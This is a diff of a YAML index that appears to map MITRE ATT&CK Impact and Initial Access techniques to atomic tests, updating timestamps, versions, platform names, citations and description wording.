+      modified: '2024-09-24T13:27:31.881Z'
       name: Inhibit System Recovery
       description: |-
         Adversaries may delete or remove built-in data and turn off services designed to aid in the recovery of a corrupted system to prevent recovery.(Citation: Talos Olympic Destroyer 2018)(Citation: FireEye WannaCry 2017) This may deny access to available backups and recovery options.
@@ -70395,7 +71329,7 @@ impact:
 
         On network devices, adversaries may leverage [Disk Wipe](https://attack.mitre.org/techniques/T1561) to delete backup firmware images and reformat the file system, then [System Shutdown/Reboot](https://attack.mitre.org/techniques/T1529) to reload the device. Together this activity may leave network devices completely inoperable and inhibit recovery operations.
 
-        Adversaries may also delete “online” backups that are connected to their network – whether via network storage media or through folders that sync to cloud services.(Citation: ZDNet Ransomware Backups 2020) In cloud environments, adversaries may disable versioning and backup policies and delete snapshots, machine images, and prior versions of objects designed to be used in disaster recovery scenarios.(Citation: Dark Reading Code Spaces Cyber Attack)(Citation: Rhino Security Labs AWS S3 Ransomware)
+        Adversaries may also delete “online” backups that are connected to their network – whether via network storage media or through folders that sync to cloud services.(Citation: ZDNet Ransomware Backups 2020) In cloud environments, adversaries may disable versioning and backup policies and delete snapshots, database backups, machine images, and prior versions of objects designed to be used in disaster recovery scenarios.(Citation: Dark Reading Code Spaces Cyber Attack)(Citation: Rhino Security Labs AWS S3 Ransomware)
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: impact
@@ -70422,7 +71356,7 @@ impact:
       - Network
       - IaaS
       - Containers
-      x_mitre_version: '1.4'
+      x_mitre_version: '1.5'
       x_mitre_data_sources:
       - 'Process: Process Creation'
       - 'Windows Registry: Windows Registry Key Modification'
@@ -70472,13 +71406,12 @@ impact:
         url: https://www.zdnet.com/article/ransomware-victims-thought-their-backups-were-safe-they-were-wrong/
       - source_name: disable_notif_synology_ransom
         description: TheDFIRReport. (2022, March 1). Disabling notifications on Synology
-          servers before ransom. Retrieved October 19, 2022.
-        url: https://twitter.com/TheDFIRReport/status/1498657590259109894
+          servers before ransom. Retrieved September 12, 2024.
+        url: https://x.com/TheDFIRReport/status/1498657590259109894
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1490
     atomic_tests: []
   T1561.001:
@@ -70546,11 +71479,10 @@ impact:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1529:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2023-03-22T20:45:22.531Z'
       name: System Shutdown/Reboot
       description: |-
         Adversaries may shutdown/reboot systems to interrupt access to, or aid in the destruction of, those systems. Operating systems may contain commands to initiate a shutdown/reboot of a machine or network device. In some cases, these commands may also be used to initiate a shutdown/reboot of a remote computer or network device via [Network Device CLI](https://attack.mitre.org/techniques/T1059/008) (e.g. <code>reload</code>).(Citation: Microsoft Shutdown Oct 2017)(Citation: alert_TA18_106A)
@@ -70615,7 +71547,6 @@ impact:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1529
     atomic_tests:
     - name: Restart System via `shutdown` - FreeBSD/macOS/Linux
@@ -70751,7 +71682,7 @@ impact:
 initial-access:
   T1133:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2023-03-30T21:01:36.318Z'
       name: External Remote Services
       description: |-
         Adversaries may leverage external-facing remote services to initially access and/or persist within a network. Remote services such as VPNs, Citrix, and other access mechanisms allow users to connect to internal enterprise network resources from external locations. There are often remote service gateways that manage connections and credential authentication for these services. Services such as [Windows Remote Management](https://attack.mitre.org/techniques/T1021/006) and [VNC](https://attack.mitre.org/techniques/T1021/005) can also be used externally.(Citation: MacOS VNC software for Remote Desktop)
@@ -70829,7 +71760,6 @@ initial-access:
         url: https://www.trendmicro.com/en_us/research/20/f/xorddos-kaiji-botnet-malware-variants-target-exposed-docker-servers.html
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      spec_version: '2.1'
       identifier: T1133
     atomic_tests: []
   T1195.001:
@@ -70879,11 +71809,10 @@ initial-access:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1566.002:
     technique:
-      modified: '2024-04-15T23:51:25.037Z'
+      modified: '2024-10-15T16:06:32.591Z'
       name: 'Phishing: Spearphishing Link'
       description: |-
         Adversaries may send spearphishing emails with a malicious link in an attempt to gain access to victim systems. Spearphishing with a link is a specific variant of spearphishing. It is different from other forms of spearphishing in that it employs the use of links to download malware contained in email, instead of attaching malicious files to the email itself, to avoid defenses that may inspect email attachments. Spearphishing may also involve social engineering techniques, such as posing as a trusted source.
@@ -70922,10 +71851,10 @@ initial-access:
       - Linux
       - macOS
       - Windows
-      - Office 365
       - SaaS
-      - Google Workspace
-      x_mitre_version: '2.6'
+      - Identity Provider
+      - Office Suite
+      x_mitre_version: '2.7'
       x_mitre_data_sources:
       - 'Network Traffic: Network Traffic Flow'
       - 'Application Log: Application Log Content'
@@ -70942,7 +71871,7 @@ initial-access:
       - source_name: ACSC Email Spoofing
         description: Australian Cyber Security Centre. (2012, December). Mitigating
           Spoofed Emails Using Sender Policy Framework. Retrieved October 19, 2020.
-        url: https://www.cyber.gov.au/sites/default/files/2019-03/spoof_email_sender_policy_framework.pdf
+        url: https://web.archive.org/web/20210708014107/https://www.cyber.gov.au/sites/default/files/2019-03/spoof_email_sender_policy_framework.pdf
       - source_name: CISA IDN ST05-016
         description: 'CISA. (2019, September 27). Security Tip (ST05-016): Understanding
           Internationalized Domain Names. Retrieved October 20, 2020.'
@@ -70981,12 +71910,11 @@ initial-access:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1566.002
     atomic_tests: []
   T1566.001:
     technique:
-      modified: '2024-01-31T14:09:27.066Z'
+      modified: '2024-10-15T16:42:01.552Z'
       name: 'Phishing: Spearphishing Attachment'
       description: "Adversaries may send spearphishing emails with a malicious attachment
         in an attempt to gain access to victim systems. Spearphishing attachment is
@@ -71048,7 +71976,7 @@ initial-access:
       - source_name: ACSC Email Spoofing
         description: Australian Cyber Security Centre. (2012, December). Mitigating
           Spoofed Emails Using Sender Policy Framework. Retrieved October 19, 2020.
-        url: https://www.cyber.gov.au/sites/default/files/2019-03/spoof_email_sender_policy_framework.pdf
+        url: https://web.archive.org/web/20210708014107/https://www.cyber.gov.au/sites/default/files/2019-03/spoof_email_sender_policy_framework.pdf
       - source_name: Unit 42 DarkHydrus July 2018
         description: Falcone, R., et al. (2018, July 27). New Threat Actor Group DarkHydrus
           Targets Middle East Government. Retrieved August 2, 2018.
@@ -71065,7 +71993,6 @@ initial-access:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1566.001
     atomic_tests: []
   T1195.003:
@@ -71095,7 +72022,7 @@ initial-access:
         the adversary a high degree of control over the system. Hardware backdoors
         may be inserted into various devices, such as servers, workstations, network
         infrastructure, or peripherals.
-      modified: '2022-05-24T14:00:00.188Z'
+      modified: '2022-04-28T16:05:10.755Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       name: Compromise Hardware Supply Chain
       x_mitre_detection: Perform physical inspection of hardware to look for potential
@@ -71109,7 +72036,6 @@ initial-access:
       - 'Sensor Health: Host Status'
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1091:
     technique:
@@ -71172,12 +72098,11 @@ initial-access:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1091
     atomic_tests: []
   T1195:
     technique:
-      modified: '2024-02-26T14:23:37.009Z'
+      modified: '2024-10-04T11:17:00.778Z'
       name: Supply Chain Compromise
       description: "Adversaries may manipulate products or product delivery mechanisms
         prior to receipt by a final consumer for the purpose of data or system compromise.\n\nSupply
@@ -71252,7 +72177,7 @@ initial-access:
         description: Schneider Electric. (2018, August 24). Security Notification
           – USB Removable Media Provided With Conext Combox and Conext Battery Monitor.
           Retrieved May 28, 2019.
-        url: https://www.se.com/ww/en/download/document/SESN-2018-236-01/
+        url: https://www.se.com/us/en/download/document/SESN-2018-236-01/
       - source_name: Trendmicro NPM Compromise
         description: Trendmicro. (2018, November 29). Hacker Infects Node.js Package
           to Steal from Bitcoin Wallets. Retrieved April 10, 2019.
@@ -71266,19 +72191,18 @@ initial-access:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1195
     atomic_tests: []
   T1190:
     technique:
-      modified: '2023-11-28T21:27:35.373Z'
+      modified: '2024-09-24T14:33:53.433Z'
       name: Exploit Public-Facing Application
       description: |-
         Adversaries may attempt to exploit a weakness in an Internet-facing host or system to initially access a network. The weakness in the system can be a software bug, a temporary glitch, or a misconfiguration.
 
-        Exploited applications are often websites/web servers, but can also include databases (like SQL), standard services (like SMB or SSH), network device administration and management protocols (like SNMP and Smart Install), and any other system with Internet accessible open sockets.(Citation: NVD CVE-2016-6662)(Citation: CIS Multiple SMB Vulnerabilities)(Citation: US-CERT TA18-106A Network Infrastructure Devices 2018)(Citation: Cisco Blog Legacy Device Attacks)(Citation: NVD CVE-2014-7169) Depending on the flaw being exploited this may also involve [Exploitation for Defense Evasion](https://attack.mitre.org/techniques/T1211) or [Exploitation for Client Execution](https://attack.mitre.org/techniques/T1203).
+        Exploited applications are often websites/web servers, but can also include databases (like SQL), standard services (like SMB or SSH), network device administration and management protocols (like SNMP and Smart Install), and any other system with Internet-accessible open sockets.(Citation: NVD CVE-2016-6662)(Citation: CIS Multiple SMB Vulnerabilities)(Citation: US-CERT TA18-106A Network Infrastructure Devices 2018)(Citation: Cisco Blog Legacy Device Attacks)(Citation: NVD CVE-2014-7169) Depending on the flaw being exploited this may also involve [Exploitation for Defense Evasion](https://attack.mitre.org/techniques/T1211) or [Exploitation for Client Execution](https://attack.mitre.org/techniques/T1203).
 
-        If an application is hosted on cloud-based infrastructure and/or is containerized, then exploiting it may lead to compromise of the underlying instance or container. This can allow an adversary a path to access the cloud or container APIs, exploit container host access via [Escape to Host](https://attack.mitre.org/techniques/T1611), or take advantage of weak identity and access management policies.
+        If an application is hosted on cloud-based infrastructure and/or is containerized, then exploiting it may lead to compromise of the underlying instance or container. This can allow an adversary a path to access the cloud or container APIs (e.g., via the [Cloud Instance Metadata API](https://attack.mitre.org/techniques/T1552/005)), exploit container host access via [Escape to Host](https://attack.mitre.org/techniques/T1611), or take advantage of weak identity and access management policies.
 
         Adversaries may also exploit edge network infrastructure and related appliances, specifically targeting devices that do not support robust host-based defenses.(Citation: Mandiant Fortinet Zero Day)(Citation: Wired Russia Cyberwar)
 
@@ -71304,7 +72228,7 @@ initial-access:
       - Linux
       - macOS
       - Containers
-      x_mitre_version: '2.5'
+      x_mitre_version: '2.6'
       x_mitre_data_sources:
       - 'Network Traffic: Network Traffic Content'
       - 'Application Log: Application Log Content'
@@ -71359,7 +72283,6 @@ initial-access:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1659:
     technique:
@@ -71422,11 +72345,10 @@ initial-access:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1078.001:
     technique:
-      modified: '2024-03-07T14:27:04.770Z'
+      modified: '2024-10-14T22:11:30.271Z'
       name: 'Valid Accounts: Default Accounts'
       description: |-
         Adversaries may obtain and abuse credentials of a default account as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Default accounts are those that are built-into an OS, such as the Guest or Administrator accounts on Windows systems. Default accounts also include default factory/provider set accounts on other types of systems, software, or devices, including the root user account in AWS and the default service account in Kubernetes.(Citation: Microsoft Local Accounts Feb 2019)(Citation: AWS Root User)(Citation: Threat Matrix for Kubernetes)
@@ -71441,6 +72363,7 @@ initial-access:
         phase_name: privilege-escalation
       - kill_chain_name: mitre-attack
         phase_name: initial-access
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_deprecated: false
       x_mitre_detection: Monitor whether default accounts have been activated or logged
         into. These audits should also include checks on any appliances and applications
@@ -71449,18 +72372,18 @@ initial-access:
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: true
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
       - Windows
-      - Azure AD
-      - Office 365
       - SaaS
       - IaaS
       - Linux
       - macOS
-      - Google Workspace
       - Containers
       - Network
-      x_mitre_version: '1.3'
+      - Office Suite
+      - Identity Provider
+      x_mitre_version: '1.4'
       x_mitre_data_sources:
       - 'Logon Session: Logon Session Creation'
       - 'User Account: User Account Authentication'
@@ -71492,14 +72415,11 @@ initial-access:
         url: https://www.microsoft.com/security/blog/2020/04/02/attack-matrix-kubernetes/
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.2.0
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1078.001
     atomic_tests: []
   T1199:
     technique:
-      modified: '2022-11-08T14:00:00.188Z'
+      modified: '2024-10-15T16:08:39.968Z'
       name: Trusted Relationship
       description: |-
         Adversaries may breach or otherwise leverage organizations who have access to intended victims. Access through trusted third party relationship abuses an existing connection that may not be protected or receives less scrutiny than standard mechanisms of gaining access to a network.
@@ -71510,6 +72430,11 @@ initial-access:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: initial-access
+      x_mitre_contributors:
+      - Praetorian
+      - ExtraHop
+      - Jannie Li, Microsoft Threat Intelligence Center (MSTIC)
+      x_mitre_deprecated: false
       x_mitre_detection: Establish monitoring for activity conducted by second and
         third party providers and other trusted entities that may be leveraged as
         a means to gain access to the network. Depending on the type of relationship,
@@ -71518,22 +72443,18 @@ initial-access:
         is based on IT services. Adversaries may be able to act quickly towards an
         objective, so proper monitoring for behavior related to Credential Access,
         Lateral Movement, and Collection will be important to detect the intrusion.
+      x_mitre_domains:
+      - enterprise-attack
+      x_mitre_is_subtechnique: false
       x_mitre_platforms:
       - Windows
       - SaaS
       - IaaS
       - Linux
       - macOS
-      - Office 365
-      x_mitre_is_subtechnique: false
-      x_mitre_deprecated: false
-      x_mitre_domains:
-      - enterprise-attack
-      x_mitre_version: '2.3'
-      x_mitre_contributors:
-      - Praetorian
-      - ExtraHop
-      - Jannie Li, Microsoft Threat Intelligence Center (MSTIC)
+      - Identity Provider
+      - Office Suite
+      x_mitre_version: '2.4'
       x_mitre_data_sources:
       - 'Logon Session: Logon Session Creation'
       - 'Logon Session: Logon Session Metadata'
@@ -71558,36 +72479,19 @@ initial-access:
         url: https://support.microsoft.com/en-us/topic/partners-offer-delegated-administration-26530dc0-ebba-415b-86b1-b55bc06b073e?ui=en-us&rs=en-us&ad=us
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 2.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1566:
     technique:
-      modified: '2024-03-01T16:56:32.245Z'
+      modified: '2024-10-07T15:00:19.668Z'
       name: Phishing
-      description: "Adversaries may send phishing messages to gain access to victim
-        systems. All forms of phishing are electronically delivered social engineering.
-        Phishing can be targeted, known as spearphishing. In spearphishing, a specific
-        individual, company, or industry will be targeted by the adversary. More generally,
-        adversaries can conduct non-targeted phishing, such as in mass malware spam
-        campaigns.\n\nAdversaries may send victims emails containing malicious attachments
-        or links, typically to execute malicious code on victim systems. Phishing
-        may also be conducted via third-party services, like social media platforms.
-        Phishing may also involve social engineering techniques, such as posing as
-        a trusted source, as well as evasive techniques such as removing or manipulating
-        emails or metadata/headers from compromised accounts being abused to send
-        messages (e.g., [Email Hiding Rules](https://attack.mitre.org/techniques/T1564/008)).(Citation:
-        Microsoft OAuth Spam 2022)(Citation: Palo Alto Unit 42 VBA Infostealer 2014)
-        Another way to accomplish this is by forging or spoofing(Citation: Proofpoint-spoof)
-        the identity of the sender which can be used to fool both the human recipient
-        as well as automated security tools.(Citation: cyberproof-double-bounce) \n\nVictims
-        may also receive phishing messages that instruct them to call a phone number
-        where they are directed to visit a malicious URL, download malware,(Citation:
-        sygnia Luna Month)(Citation: CISA Remote Monitoring and Management Software)
-        or install adversary-accessible remote management tools onto their computer
-        (i.e., [User Execution](https://attack.mitre.org/techniques/T1204)).(Citation:
-        Unit42 Luna Moth)"
+      description: |-
+        Adversaries may send phishing messages to gain access to victim systems. All forms of phishing are electronically delivered social engineering. Phishing can be targeted, known as spearphishing. In spearphishing, a specific individual, company, or industry will be targeted by the adversary. More generally, adversaries can conduct non-targeted phishing, such as in mass malware spam campaigns.
+
+        Adversaries may send victims emails containing malicious attachments or links, typically to execute malicious code on victim systems. Phishing may also be conducted via third-party services, like social media platforms. Phishing may also involve social engineering techniques, such as posing as a trusted source, as well as evasive techniques such as removing or manipulating emails or metadata/headers from compromised accounts being abused to send messages (e.g., [Email Hiding Rules](https://attack.mitre.org/techniques/T1564/008)).(Citation: Microsoft OAuth Spam 2022)(Citation: Palo Alto Unit 42 VBA Infostealer 2014) Another way to accomplish this is by forging or spoofing(Citation: Proofpoint-spoof) the identity of the sender which can be used to fool both the human recipient as well as automated security tools,(Citation: cyberproof-double-bounce) or by including the intended target as a party to an existing email thread that includes malicious files or links (i.e., "thread hijacking").(Citation: phishing-krebs)
+
+        Victims may also receive phishing messages that instruct them to call a phone number where they are directed to visit a malicious URL, download malware,(Citation: sygnia Luna Month)(Citation: CISA Remote Monitoring and Management Software) or install adversary-accessible remote management tools onto their computer (i.e., [User Execution](https://attack.mitre.org/techniques/T1204)).(Citation: Unit42 Luna Moth)
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: initial-access
@@ -71616,9 +72520,9 @@ initial-access:
       - macOS
       - Windows
       - SaaS
-      - Office 365
-      - Google Workspace
-      x_mitre_version: '2.5'
+      - Identity Provider
+      - Office Suite
+      x_mitre_version: '2.6'
       x_mitre_data_sources:
       - 'File: File Creation'
       - 'Network Traffic: Network Traffic Flow'
@@ -71636,7 +72540,11 @@ initial-access:
       - source_name: ACSC Email Spoofing
         description: Australian Cyber Security Centre. (2012, December). Mitigating
           Spoofed Emails Using Sender Policy Framework. Retrieved October 19, 2020.
-        url: https://www.cyber.gov.au/sites/default/files/2019-03/spoof_email_sender_policy_framework.pdf
+        url: https://web.archive.org/web/20210708014107/https://www.cyber.gov.au/sites/default/files/2019-03/spoof_email_sender_policy_framework.pdf
+      - source_name: phishing-krebs
+        description: 'Brian Krebs. (2024, March 28). Thread Hijacking: Phishes That
+          Prey on Your Curiosity. Retrieved September 27, 2024.'
+        url: https://krebsonsecurity.com/2024/03/thread-hijacking-phishes-that-prey-on-your-curiosity/
       - source_name: CISA Remote Monitoring and Management Software
         description: CISA. (n.d.). Protecting Against Malicious Use of Remote Monitoring
           and Management Software. Retrieved February 2, 2023.
@@ -71674,11 +72582,10 @@ initial-access:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1078:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2024-10-15T16:09:46.024Z'
       name: Valid Accounts
       description: |-
         Adversaries may obtain and abuse credentials of existing accounts as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Compromised credentials may be used to bypass access controls placed on various resources on systems within the network and may even be used for persistent access to remote systems and externally available services, such as VPNs, Outlook Web Access, network devices, and remote desktop.(Citation: volexity_0day_sophos_FW) Compromised credentials may also grant an adversary increased privilege to specific systems or access to restricted areas of the network. Adversaries may choose not to use malware or tools in conjunction with the legitimate access those credentials provide to make it harder to detect their presence.
@@ -71695,7 +72602,6 @@ initial-access:
         phase_name: privilege-escalation
       - kill_chain_name: mitre-attack
         phase_name: initial-access
-      x_mitre_attack_spec_version: 3.1.0
       x_mitre_contributors:
       - Syed Ummar Farooqh, McAfee
       - Prasad Somasamudram, McAfee
@@ -71705,7 +72611,7 @@ initial-access:
       - Netskope
       - Mark Wee
       - Praetorian
-      - Goldstein Menachem
+      - Menachem Goldstein
       x_mitre_deprecated: false
       x_mitre_detection: |-
         Configure robust, consistent account activity audit policies across the enterprise and with externally accessible services.(Citation: TechNet Audit Policy) Look for suspicious account behavior across systems that share accounts, either user, admin, or service accounts. Examples: one account logged into multiple systems simultaneously; multiple accounts logged into the same machine simultaneously; accounts logged in at odd times or outside of business hours. Activity may be from interactive login sessions or process ownership from accounts being used to execute binaries on a remote system as a particular account. Correlate other security systems with login information (e.g., a user has an active login session but has not entered the building or does not have VPN access).
@@ -71714,19 +72620,17 @@ initial-access:
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: false
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
       - Windows
-      - Azure AD
-      - Office 365
       - SaaS
       - IaaS
       - Linux
       - macOS
-      - Google Workspace
       - Containers
       - Network
-      x_mitre_version: '2.6'
+      - Office Suite
+      - Identity Provider
+      x_mitre_version: '2.7'
       x_mitre_data_sources:
       - 'Logon Session: Logon Session Creation'
       - 'User Account: User Account Authentication'
@@ -71774,11 +72678,12 @@ initial-access:
         url: https://technet.microsoft.com/en-us/library/dn487457.aspx
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      spec_version: '2.1'
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
     atomic_tests: []
   T1566.004:
     technique:
-      modified: '2023-10-15T11:49:40.990Z'
+      modified: '2024-10-15T16:06:47.134Z'
       name: Spearphishing Voice
       description: |-
         Adversaries may use voice communications to ultimately gain access to victim systems. Spearphishing voice is a specific variant of spearphishing. It is different from other forms of spearphishing in that is employs the use of manipulating a user into providing access to systems through a phone call or other forms of voice communications. Spearphishing frequently involves social engineering techniques, such as posing as a trusted source (ex: [Impersonation](https://attack.mitre.org/techniques/T1656)) and/or creating a sense of urgency or alarm for the recipient.
@@ -71798,10 +72703,8 @@ initial-access:
       - Linux
       - macOS
       - Windows
-      - Office 365
-      - SaaS
-      - Google Workspace
-      x_mitre_version: '1.0'
+      - Identity Provider
+      x_mitre_version: '1.1'
       x_mitre_data_sources:
       - 'Application Log: Application Log Content'
       type: attack-pattern
@@ -71834,7 +72737,6 @@ initial-access:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1195.002:
     technique:
@@ -71873,7 +72775,7 @@ initial-access:
         may be specific to a desired victim set or may be distributed to a broad set
         of consumers but only move on to additional tactics on specific victims.(Citation:
         Avast CCleaner3 2018)(Citation: Command Five SK 2011)  "
-      modified: '2022-05-24T14:00:00.188Z'
+      modified: '2022-04-28T16:04:36.636Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       name: Compromise Software Supply Chain
       x_mitre_detection: 'Use verification of distributed binaries through hash checking
@@ -71888,7 +72790,6 @@ initial-access:
       - 'File: File Metadata'
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1078.002:
     technique:
@@ -71968,11 +72869,10 @@ initial-access:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1200:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2023-03-30T21:01:40.332Z'
       name: Hardware Additions
       description: |-
         Adversaries may introduce computer accessories, networking hardware, or other computing devices into a system or network that can be used as a vector to gain access. Rather than just connecting and distributing payloads via removable storage (i.e. [Replication Through Removable Media](https://attack.mitre.org/techniques/T1091)), more robust hardware additions can be used to introduce new functionalities and/or features into a system that can then be abused.
@@ -72028,11 +72928,10 @@ initial-access:
         url: https://www.youtube.com/watch?v=fXthwl6ShOg
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      spec_version: '2.1'
     atomic_tests: []
   T1189:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2024-10-15T15:55:47.494Z'
       name: Drive-by Compromise
       description: "Adversaries may gain access to a system through a user visiting
         a website over the normal course of browsing. With this technique, the user's
@@ -72093,8 +72992,8 @@ initial-access:
       - Windows
       - Linux
       - macOS
-      - SaaS
-      x_mitre_version: '1.5'
+      - Identity Provider
+      x_mitre_version: '1.6'
       x_mitre_data_sources:
       - 'Application Log: Application Log Content'
       - 'Network Traffic: Network Traffic Content'
@@ -72122,13 +73021,12 @@ initial-access:
         url: https://www.volexity.com/blog/2017/11/06/oceanlotus-blossoms-mass-digital-surveillance-and-exploitation-of-asean-nations-the-media-human-rights-and-civil-society/
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1078.004:
     technique:
-      modified: '2024-03-29T15:42:13.499Z'
+      modified: '2024-10-14T22:11:30.271Z'
       name: 'Valid Accounts: Cloud Accounts'
       description: "Valid accounts in cloud environments may allow adversaries to
         perform actions to achieve Initial Access, Persistence, Privilege Escalation,
@@ -72168,8 +73066,10 @@ initial-access:
         phase_name: privilege-escalation
       - kill_chain_name: mitre-attack
         phase_name: initial-access
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_contributors:
       - Jon Sternstein, Stern Security
+      - Arun Seelagan, CISA
       x_mitre_deprecated: false
       x_mitre_detection: Monitor the activity of cloud accounts to detect abnormal
         or malicious behavior, such as accessing information outside of the normal
@@ -72177,13 +73077,13 @@ initial-access:
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: true
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
-      - Azure AD
-      - Office 365
       - SaaS
       - IaaS
-      - Google Workspace
-      x_mitre_version: '1.7'
+      - Office Suite
+      - Identity Provider
+      x_mitre_version: '1.8'
       x_mitre_data_sources:
       - 'User Account: User Account Authentication'
       - 'Logon Session: Logon Session Metadata'
@@ -72214,14 +73114,11 @@ initial-access:
         url: https://docs.microsoft.com/en-us/windows-server/identity/ad-fs/deployment/how-to-connect-fed-azure-adfs
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.2.0
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1078.004
     atomic_tests: []
   T1566.003:
     technique:
-      modified: '2024-01-31T14:15:55.690Z'
+      modified: '2024-10-15T15:16:30.272Z'
       name: Spearphishing via Service
       description: "Adversaries may send spearphishing messages via third-party services
         in an attempt to gain access to victim systems. Spearphishing via service
@@ -72288,11 +73185,10 @@ initial-access:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1078.003:
     technique:
-      modified: '2023-07-14T13:04:04.591Z'
